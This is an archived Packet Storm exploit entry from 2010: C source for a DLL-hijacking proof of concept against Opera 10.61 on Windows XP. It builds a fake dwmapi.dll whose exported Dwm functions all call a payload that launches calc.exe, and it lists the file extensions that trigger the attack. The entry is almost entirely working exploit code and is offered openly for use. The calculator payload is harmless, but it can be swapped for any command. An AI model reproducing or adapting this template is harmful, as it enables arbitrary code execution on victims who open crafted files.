Opera 10.61 DLL Hijacking Exploit

2010-08-26T00:00:00
ID PACKETSTORM:93049
Type packetstorm
Reporter Nicolas Krassas
Modified 2010-08-26T00:00:00

Description

                                        
                                            `/*   
Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll )  
Date: 24/08/2010  
Author: Nicolas Krassas   
http://twitter.com/Dinosn  
Version: Opera 10.61  
Tested on: Windows XP SP3  
The code is based on the exploit from "TheLeader"  
Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl  
dwmapi.dll is used in other applications too  
*/  
  
#include <windows.h>  
#define DLLIMPORT __declspec (dllexport)  
  
DLLIMPORT void DwmDefWindowProc() { evil(); }  
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }  
DLLIMPORT void DwmEnableComposition() { evil(); }  
DLLIMPORT void DwmEnableMMCSS() { evil(); }  
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }  
DLLIMPORT void DwmGetColorizationColor() { evil(); }  
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }  
DLLIMPORT void DwmGetWindowAttribute() { evil(); }  
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }  
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }  
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }  
DLLIMPORT void DwmRegisterThumbnail() { evil(); }  
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }  
DLLIMPORT void DwmSetPresentParameters() { evil(); }  
DLLIMPORT void DwmSetWindowAttribute() { evil(); }  
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }  
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }  
  
int evil()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
  
`